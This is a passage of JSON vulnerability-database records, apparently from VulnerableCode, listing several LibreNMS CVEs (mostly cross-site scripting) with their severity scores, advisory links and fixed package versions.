actions.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2024-49754","reference_id":"","reference_type":"","scores":[{"value":"0.11981","scoring_system":"epss","scoring_elements":"0.9391","published_at":"2026-06-07T12:55:00Z"},{"value":"0.11981","scoring_system":"epss","scoring_elements":"0.93913","published_at":"2026-06-09T12:55:00Z"},{"value":"0.11981","scoring_system":"epss","scoring_elements":"0.93908","published_at":"2026-06-08T12:55:00Z"},{"value":"0.11981","scoring_system":"epss","scoring_elements":"0.93909","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2024-49754"},{"reference_url":"https://github.com/librenms/librenms","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:L/A:L"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/librenms/librenms"},{"reference_url":"https://github.com/librenms/librenms/commit/25988a937cbaebd2ba4c0517510206c404dfb359","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:L/A:L"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2024-11-15T18:53:36Z/"}],"url":"https://github.com/librenms/librenms/commit/25988a937cbaebd2ba4c0517510206c404dfb359"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2024-49754","reference_id":"CVE-2024-49754","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:L/A:L"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2024-49754"},{"reference_url":"https://github.com/advisories/GHSA-gfwr-xqmj-j27v","reference_id":"GHSA-gfwr-xqmj-j27v","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-gfwr-xqmj-j27v"},{"reference_url":"https://github.com/librenms/librenms/security/advisories/GHSA-gfwr-xqmj-j27v","reference_id":"GHSA-gfwr-xqmj-j27v","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:L/A:L"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2024-11-15T18:53:36Z/"}],"url":"https://github.com/librenms/librenms/security/advisories/GHSA-gfwr-xqmj-j27v"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/74125?format=json","purl":"pkg:composer/librenms/librenms@24.10.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-2t5k-atx8-eycd"},{"vulnerability":"VCID-3prv-5fpd-c3hd"},{"vulnerability":"VCID-5vg7-7y5w-muhw"},{"vulnerability":"VCID-7f5s-p5u4-abhh"},{"vulnerability":"VCID-7s6j-vmn5-p7eh"},{"vulnerability":"VCID-8ks5-6azh-67ed"},{"vulnerability":"VCID-8nsn-f1fc-6ucm"},{"vulnerability":"VCID-99dx-dees-2fg3"},{"vulnerability":"VCID-appm-zs6z-v3b2"},{"vulnerability":"VCID-bfnn-xz3r-sfcv"},{"vulnerability":"VCID-ca8g-usbx-5ydu"},{"vulnerability":"VCID-h5y9-mrn4-q7br"},{"vulnerability":"VCID-hj1w-rpxt-4ygp"},{"vulnerability":"VCID-kkqd-nzsw-23cr"},{"vulnerability":"VCID-mchv-4jpx-audc"},{"vulnerability":"VCID-rq5b-4ktu-syf3"},{"vulnerability":"VCID-t5mk-a8n2-rkcg"},{"vulnerability":"VCID-u45s-gxaf-vycb"},{"vulnerability":"VCID-uzy1-yh5d-dqbt"},{"vulnerability":"VCID-v2sw-u952-7qfz"},{"vulnerability":"VCID-wgnu-f2qa-9yh7"},{"vulnerability":"VCID-y5mq-m57f-b3bx"},{"vulnerability":"VCID-yhmt-yukb-kuge"},{"vulnerability":"VCID-z744-37t6-pud6"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/librenms/librenms@24.10.0"}],"aliases":["CVE-2024-49754","GHSA-gfwr-xqmj-j27v"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-5hwq-6gme-c3gh"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/49499?format=json","vulnerability_id":"VCID-5vg7-7y5w-muhw","summary":"Please find POC file here https://trendmicro-my.sharepoint.com/:u:/p/kholoud_altookhy/IQCfcnOE5ykQSb6Fm-HFI872AZ_zeIJxU-3aDk0jh_eX_NE?e=zkN76d\n\nZDI-CAN-28575: LibreNMS Alert Rule API Cross-Site Scripting Vulnerability\n\n-- CVSS -----------------------------------------\n\n4.3: AV:N/AC:L/PR:H/UI:R/S:U/C:L/I:L/A:L\n\n-- ABSTRACT -------------------------------------\n\nTrend Micro's Zero Day Initiative has identified a vulnerability affecting the following products:\nLibreNMS - LibreNMS\n\n-- VULNERABILITY DETAILS ------------------------\n* Version tested:  25.10.0\n* Installer file:  NA\n* Platform tested: NA\n\n---","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2025-68614","reference_id":"","reference_type":"","scores":[{"value":"1e-05","scoring_system":"epss","scoring_elements":"0.00012","published_at":"2026-06-09T12:55:00Z"},{"value":"1e-05","scoring_system":"epss","scoring_elements":"0.00013","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2025-68614"},{"reference_url":"https://github.com/librenms/librenms","reference_id":"","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:L/I:L/A:L"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/librenms/librenms"},{"reference_url":"https://github.com/librenms/librenms/commit/ebe6c79bf4ce0afeb575c1285afe3934e44001f1","reference_id":"","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:L/I:L/A:L"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2025-12-22T23:55:04Z/"}],"url":"https://github.com/librenms/librenms/commit/ebe6c79bf4ce0afeb575c1285afe3934e44001f1"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2025-68614","reference_id":"CVE-2025-68614","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:L/I:L/A:L"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2025-68614"},{"reference_url":"https://github.com/advisories/GHSA-c89f-8g7g-59wj","reference_id":"GHSA-c89f-8g7g-59wj","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-c89f-8g7g-59wj"},{"reference_url":"https://github.com/librenms/librenms/security/advisories/GHSA-c89f-8g7g-59wj","reference_id":"GHSA-c89f-8g7g-59wj","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:L/I:L/A:L"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2025-12-22T23:55:04Z/"}],"url":"https://github.com/librenms/librenms/security/advisories/GHSA-c89f-8g7g-59wj"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/73083?format=json","purl":"pkg:composer/librenms/librenms@25.12.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-2t5k-atx8-eycd"},{"vulnerability":"VCID-7f5s-p5u4-abhh"},{"vulnerability":"VCID-7s6j-vmn5-p7eh"},{"vulnerability":"VCID-appm-zs6z-v3b2"},{"vulnerability":"VCID-crjt-27zj-qycd"},{"vulnerability":"VCID-h5y9-mrn4-q7br"},{"vulnerability":"VCID-mchv-4jpx-audc"},{"vulnerability":"VCID-rq5b-4ktu-syf3"},{"vulnerability":"VCID-t5mk-a8n2-rkcg"},{"vulnerability":"VCID-y5mq-m57f-b3bx"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/librenms/librenms@25.12.0"}],"aliases":["CVE-2025-68614","GHSA-c89f-8g7g-59wj"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-5vg7-7y5w-muhw"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/42397?format=json","vulnerability_id":"VCID-64kz-hnxr-vud5","summary":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')\nCross-site Scripting (XSS) was found in librenms.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2022-0576","reference_id":"","reference_type":"","scores":[{"value":"6e-05","scoring_system":"epss","scoring_elements":"0.00336","published_at":"2026-06-05T12:55:00Z"},{"value":"6e-05","scoring_system":"epss","scoring_elements":"0.0033","published_at":"2026-06-09T12:55:00Z"},{"value":"6e-05","scoring_system":"epss","scoring_elements":"0.00332","published_at":"2026-06-07T12:55:00Z"},{"value":"6e-05","scoring_system":"epss","scoring_elements":"0.00338","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2022-0576"},{"reference_url":"https://github.com/librenms/librenms","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/librenms/librenms"},{"reference_url":"https://github.com/librenms/librenms/commit/135717a9a05c5bf8921f1389cbb469dcbf300bfd","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/librenms/librenms/commit/135717a9a05c5bf8921f1389cbb469dcbf300bfd"},{"reference_url":"https://huntr.dev/bounties/114ba055-a2f0-4db9-aafb-95df944ba177","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://huntr.dev/bounties/114ba055-a2f0-4db9-aafb-95df944ba177"},{"reference_url":"https://notes.netbytesec.com/2022/02/multiple-vulnerabilities-in-librenms.html","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://notes.netbytesec.com/2022/02/multiple-vulnerabilities-in-librenms.html"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2022-0576","reference_id":"CVE-2022-0576","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2022-0576"},{"reference_url":"https://github.com/advisories/GHSA-rp34-85x3-3764","reference_id":"GHSA-rp34-85x3-3764","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-rp34-85x3-3764"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/60669?format=json","purl":"pkg:composer/librenms/librenms@22.1.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-13ug-m6cb-hbcc"},{"vulnerability":"VCID-1q9d-aqn7-67ad"},{"vulnerability":"VCID-2ccw-938t-yyaj"},{"vulnerability":"VCID-2t5k-atx8-eycd"},{"vulnerability":"VCID-2w1a-3ym6-hygb"},{"vulnerability":"VCID-2z9m-fwyr-17b3"},{"vulnerability":"VCID-3b6p-2q4u-kkb5"},{"vulnerability":"VCID-5f5f-pkcz-bfhr"},{"vulnerability":"VCID-5hwq-6gme-c3gh"},{"vulnerability":"VCID-5vg7-7y5w-muhw"},{"vulnerability":"VCID-64kz-hnxr-vud5"},{"vulnerability":"VCID-6cy6-6ss3-tqaz"},{"vulnerability":"VCID-76bn-2u1y-kqf2"},{"vulnerability":"VCID-7f5s-p5u4-abhh"},{"vulnerability":"VCID-7fbt-znx9-ukaj"},{"vulnerability":"VCID-7m7b-578h-bqhj"},{"vulnerability":"VCID-7s6j-vmn5-p7eh"},{"vulnerability":"VCID-7srz-umtt-n7e1"},{"vulnerability":"VCID-8ks5-6azh-67ed"},{"vulnerability":"VCID-8nsn-f1fc-6ucm"},{"vulnerability":"VCID-98mh-t1va-xqa8"},{"vulnerability":"VCID-99dx-dees-2fg3"},{"vulnerability":"VCID-af73-74xn-9fap"},{"vulnerability":"VCID-appm-zs6z-v3b2"},{"vulnerability":"VCID-b67g-878z-sygx"},{"vulnerability":"VCID-bfnn-xz3r-sfcv"},{"vulnerability":"VCID-ca8g-usbx-5ydu"},{"vulnerability":"VCID-cvn6-ggwj-9fcm"},{"vulnerability":"VCID-dff6-r5mp-p3d5"},{"vulnerability":"VCID-f9v9-rmse-cbcg"},{"vulnerability":"VCID-fc9k-4dhn-m7du"},{"vulnerability":"VCID-gj21-fy13-33h2"},{"vulnerability":"VCID-h5y9-mrn4-q7br"},{"vulnerability":"VCID-hacq-7c9c-qkaz"},{"vulnerability":"VCID-hj1w-rpxt-4ygp"},{"vulnerability":"VCID-jjwh-716d-73hc"},{"vulnerability":"VCID-jwh7-vtxs-aqhr"},{"vulnerability":"VCID-kkqd-nzsw-23cr"},{"vulnerability":"VCID-kn2w-mmss-s7hu"},{"vulnerability":"VCID-m1hm-kqrc-3kbj"},{"vulnerability":"VCID-mchv-4jpx-audc"},{"vulnerability":"VCID-me5y-39aj-fkhe"},{"vulnerability":"VCID-mhf4-mtt1-t3fn"},{"vulnerability":"VCID-n5u3-c21p-ukas"},{"vulnerability":"VCID-ncgs-c7tb-gbfg"},{"vulnerability":"VCID-nyn8-7mkk-zbb3"},{"vulnerability":"VCID-pksv-nv1a-sqev"},{"vulnerability":"VCID-qhpe-7ws8-kqb7"},{"vulnerability":"VCID-qqnn-43db-guek"},{"vulnerability":"VCID-sa1y-ej2a-fba9"},{"vulnerability":"VCID-t5mk-a8n2-rkcg"},{"vulnerability":"VCID-u1km-tzd2-5bhq"},{"vulnerability":"VCID-us6w-wwkm-dqc5"},{"vulnerability":"VCID-uuwy-rk5r-tkc7"},{"vulnerability":"VCID-ux81-kyy9-bkaz"},{"vulnerability":"VCID-uzy1-yh5d-dqbt"},{"vulnerability":"VCID-v2sw-u952-7qfz"},{"vulnerability":"VCID-v3wv-6q6b-fqa3"},{"vulnerability":"VCID-vepx-waum-1bfc"},{"vulnerability":"VCID-w5dm-5pyj-cfef"},{"vulnerability":"VCID-w9mu-bbkx-sbeq"},{"vulnerability":"VCID-whxh-v47a-8yhh"},{"vulnerability":"VCID-wkt4-vdr8-mkgk"},{"vulnerability":"VCID-x1aq-5a19-yye7"},{"vulnerability":"VCID-y3qu-d719-jff6"},{"vulnerability":"VCID-y5mq-m57f-b3bx"},{"vulnerability":"VCID-y6jm-2987-9uh2"},{"vulnerability":"VCID-yhmt-yukb-kuge"},{"vulnerability":"VCID-ywp5-cwm9-afb5"},{"vulnerability":"VCID-z744-37t6-pud6"},{"vulnerability":"VCID-zech-eg55-gbcn"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/librenms/librenms@22.1.0"},{"url":"http://public2.vulnerablecode.io/api/packages/60660?format=json","purl":"pkg:composer/librenms/librenms@22.2.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-13ug-m6cb-hbcc"},{"vulnerability":"VCID-2ccw-938t-yyaj"},{"vulnerability":"VCID-2t5k-atx8-eycd"},{"vulnerability":"VCID-2w1a-3ym6-hygb"},{"vulnerability":"VCID-2z9m-fwyr-17b3"},{"vulnerability":"VCID-3b6p-2q4u-kkb5"},{"vulnerability":"VCID-5f5f-pkcz-bfhr"},{"vulnerability":"VCID-5hwq-6gme-c3gh"},{"vulnerability":"VCID-5vg7-7y5w-muhw"},{"vulnerability":"VCID-6cy6-6ss3-tqaz"},{"vulnerability":"VCID-7f5s-p5u4-abhh"},{"vulnerability":"VCID-7fbt-znx9-ukaj"},{"vulnerability":"VCID-7m7b-578h-bqhj"},{"vulnerability":"VCID-7s6j-vmn5-p7eh"},{"vulnerability":"VCID-7srz-umtt-n7e1"},{"vulnerability":"VCID-8ks5-6azh-67ed"},{"vulnerability":"VCID-8nsn-f1fc-6ucm"},{"vulnerability":"VCID-98mh-t1va-xqa8"},{"vulnerability":"VCID-99dx-dees-2fg3"},{"vulnerability":"VCID-af73-74xn-9fap"},{"vulnerability":"VCID-appm-zs6z-v3b2"},{"vulnerability":"VCID-b67g-878z-sygx"},{"vulnerability":"VCID-bfnn-xz3r-sfcv"},{"vulnerability":"VCID-ca8g-usbx-5ydu"},{"vulnerability":"VCID-cvn6-ggwj-9fcm"},{"vulnerability":"VCID-dff6-r5mp-p3d5"},{"vulnerability":"VCID-f9v9-rmse-cbcg"},{"vulnerability":"VCID-fc9k-4dhn-m7du"},{"vulnerability":"VCID-gj21-fy13-33h2"},{"vulnerability":"VCID-h5y9-mrn4-q7br"},{"vulnerability":"VCID-hacq-7c9c-qkaz"},{"vulnerability":"VCID-hj1w-rpxt-4ygp"},{"vulnerability":"VCID-jjwh-716d-73hc"},{"vulnerability":"VCID-jwh7-vtxs-aqhr"},{"vulnerability":"VCID-kkqd-nzsw-23cr"},{"vulnerability":"VCID-kn2w-mmss-s7hu"},{"vulnerability":"VCID-mchv-4jpx-audc"},{"vulnerability":"VCID-me5y-39aj-fkhe"},{"vulnerability":"VCID-mhf4-mtt1-t3fn"},{"vulnerability":"VCID-n5u3-c21p-ukas"},{"vulnerability":"VCID-ncgs-c7tb-gbfg"},{"vulnerability":"VCID-nyn8-7mkk-zbb3"},{"vulnerability":"VCID-pksv-nv1a-sqev"},{"vulnerability":"VCID-qhpe-7ws8-kqb7"},{"vulnerability":"VCID-qqnn-43db-guek"},{"vulnerability":"VCID-sa1y-ej2a-fba9"},{"vulnerability":"VCID-t5mk-a8n2-rkcg"},{"vulnerability":"VCID-u1km-tzd2-5bhq"},{"vulnerability":"VCID-us6w-wwkm-dqc5"},{"vulnerability":"VCID-uuwy-rk5r-tkc7"},{"vulnerability":"VCID-ux81-kyy9-bkaz"},{"vulnerability":"VCID-uzy1-yh5d-dqbt"},{"vulnerability":"VCID-v2sw-u952-7qfz"},{"vulnerability":"VCID-v3wv-6q6b-fqa3"},{"vulnerability":"VCID-vepx-waum-1bfc"},{"vulnerability":"VCID-w5dm-5pyj-cfef"},{"vulnerability":"VCID-w9mu-bbkx-sbeq"},{"vulnerability":"VCID-whxh-v47a-8yhh"},{"vulnerability":"VCID-x1aq-5a19-yye7"},{"vulnerability":"VCID-y3qu-d719-jff6"},{"vulnerability":"VCID-y5mq-m57f-b3bx"},{"vulnerability":"VCID-y6jm-2987-9uh2"},{"vulnerability":"VCID-yhmt-yukb-kuge"},{"vulnerability":"VCID-ywp5-cwm9-afb5"},{"vulnerability":"VCID-z744-37t6-pud6"},{"vulnerability":"VCID-zech-eg55-gbcn"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/librenms/librenms@22.2.0"},{"url":"http://public2.vulnerablecode.io/api/packages/539238?format=json","purl":"pkg:composer/librenms/librenms@201609","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/librenms/librenms@201609"}],"aliases":["CVE-2022-0576","GHSA-rp34-85x3-3764"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-64kz-hnxr-vud5"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/46431?format=json","vulnerability_id":"VCID-6cy6-6ss3-tqaz","summary":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')\nLibreNMS is an auto-discovering PHP/MySQL/SNMP based network monitoring which includes support for a wide range of network hardware and operating systems. Affected versions are subject to a cross site scripting (XSS) vulnerability in the device group popups. This issue has been addressed in commit `faf66035ea` which has been included in release version 23.11.0. Users are advised to upgrade. There are no known workarounds for this vulnerability.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2023-48295","reference_id":"","reference_type":"","scores":[{"value":"0.00223","scoring_system":"epss","scoring_elements":"0.45023","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00223","scoring_system":"epss","scoring_elements":"0.45007","published_at":"2026-06-09T12:55:00Z"},{"value":"0.00223","scoring_system":"epss","scoring_elements":"0.44994","published_at":"2026-06-08T12:55:00Z"},{"value":"0.00223","scoring_system":"epss","scoring_elements":"0.45044","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00223","scoring_system":"epss","scoring_elements":"0.45039","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2023-48295"},{"reference_url":"https://github.com/librenms/librenms","reference_id":"","reference_type":"","scores":[{"value":"6.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/librenms/librenms"},{"reference_url":"https://github.com/librenms/librenms/blob/63eeeb71722237d1461a37bb6da99fda25e02c91/app/Http/Controllers/DeviceGroupController.php#L173C21-L173C21","reference_id":"","reference_type":"","scores":[{"value":"6.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2024-08-10T15:46:31Z/"}],"url":"https://github.com/librenms/librenms/blob/63eeeb71722237d1461a37bb6da99fda25e02c91/app/Http/Controllers/DeviceGroupController.php#L173C21-L173C21"},{"reference_url":"https://github.com/librenms/librenms/commit/faf66035ea1f4c1c4f34559b9d0ed40ee4a19f90","reference_id":"","reference_type":"","scores":[{"value":"6.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2024-08-10T15:46:31Z/"}],"url":"https://github.com/librenms/librenms/commit/faf66035ea1f4c1c4f34559b9d0ed40ee4a19f90"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2023-48295","reference_id":"CVE-2023-48295","reference_type":"","scores":[{"value":"6.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2023-48295"},{"reference_url":"https://github.com/advisories/GHSA-8phr-637g-pxrg","reference_id":"GHSA-8phr-637g-pxrg","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-8phr-637g-pxrg"},{"reference_url":"https://github.com/librenms/librenms/security/advisories/GHSA-8phr-637g-pxrg","reference_id":"GHSA-8phr-637g-pxrg","reference_type":"","scores":[{"value":"6.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:L/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2024-08-10T15:46:31Z/"}],"url":"https://github.com/librenms/librenms/security/advisories/GHSA-8phr-637g-pxrg"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/67799?format=json","purl":"pkg:composer/librenms/librenms@23.11.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-2t5k-atx8-eycd"},{"vulnerability":"VCID-2w1a-3ym6-hygb"},{"vulnerability":"VCID-2z9m-fwyr-17b3"},{"vulnerability":"VCID-3prv-5fpd-c3hd"},{"vulnerability":"VCID-5f5f-pkcz-bfhr"},{"vulnerability":"VCID-5hwq-6gme-c3gh"},{"vulnerability":"VCID-5vg7-7y5w-muhw"},{"vulnerability":"VCID-7f5s-p5u4-abhh"},{"vulnerability":"VCID-7m7b-578h-bqhj"},{"vulnerability":"VCID-7s6j-vmn5-p7eh"},{"vulnerability":"VCID-8ks5-6azh-67ed"},{"vulnerability":"VCID-8nsn-f1fc-6ucm"},{"vulnerability":"VCID-98mh-t1va-xqa8"},{"vulnerability":"VCID-99dx-dees-2fg3"},{"vulnerability":"VCID-appm-zs6z-v3b2"},{"vulnerability":"VCID-bfnn-xz3r-sfcv"},{"vulnerability":"VCID-ca8g-usbx-5ydu"},{"vulnerability":"VCID-dff6-r5mp-p3d5"},{"vulnerability":"VCID-f9v9-rmse-cbcg"},{"vulnerability":"VCID-fc9k-4dhn-m7du"},{"vulnerability":"VCID-gj21-fy13-33h2"},{"vulnerability":"VCID-h5y9-mrn4-q7br"},{"vulnerability":"VCID-hacq-7c9c-qkaz"},{"vulnerability":"VCID-hj1w-rpxt-4ygp"},{"vulnerability":"VCID-jjwh-716d-73hc"},{"vulnerability":"VCID-jwh7-vtxs-aqhr"},{"vulnerability":"VCID-kkqd-nzsw-23cr"},{"vulnerability":"VCID-mchv-4jpx-audc"},{"vulnerability":"VCID-me5y-39aj-fkhe"},{"vulnerability":"VCID-ncgs-c7tb-gbfg"},{"vulnerability":"VCID-pksv-nv1a-sqev"},{"vulnerability":"VCID-qhpe-7ws8-kqb7"},{"vulnerability":"VCID-t5mk-a8n2-rkcg"},{"vulnerability":"VCID-uuwy-rk5r-tkc7"},{"vulnerability":"VCID-ux81-kyy9-bkaz"},{"vulnerability":"VCID-uzy1-yh5d-dqbt"},{"vulnerability":"VCID-v2sw-u952-7qfz"},{"vulnerability":"VCID-v3wv-6q6b-fqa3"},{"vulnerability":"VCID-vepx-waum-1bfc"},{"vulnerability":"VCID-whxh-v47a-8yhh"},{"vulnerability":"VCID-y5mq-m57f-b3bx"},{"vulnerability":"VCID-yhmt-yukb-kuge"},{"vulnerability":"VCID-ywp5-cwm9-afb5"},{"vulnerability":"VCID-z744-37t6-pud6"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/librenms/librenms@23.11.0"},{"url":"http://public2.vulnerablecode.io/api/packages/539238?format=json","purl":"pkg:composer/librenms/librenms@201609","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/librenms/librenms@201609"}],"aliases":["CVE-2023-48295","GHSA-8phr-637g-pxrg"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-6cy6-6ss3-tqaz"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/42398?format=json","vulnerability_id":"VCID-76bn-2u1y-kqf2","summary":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')\nA stored Cross-site Scripting (XSS) vulnerability was found in librenms.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2022-0575","reference_id":"","reference_type":"","scores":[{"value":"0.00026","scoring_system":"epss","scoring_elements":"0.07936","published_at":"2026-06-04T12:55:00Z"},{"value":"0.00026","scoring_system":"epss","scoring_elements":"0.07983","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00026","scoring_system":"epss","scoring_elements":"0.07969","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00026","scoring_system":"epss","scoring_elements":"0.07927","published_at":"2026-06-09T12:55:00Z"},{"value":"0.00026","scoring_system":"epss","scoring_elements":"0.07908","published_at":"2026-06-08T12:55:00Z"},{"value":"0.00026","scoring_system":"epss","scoring_elements":"0.07959","published_at":"2026-06-07T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2022-0575"},{"re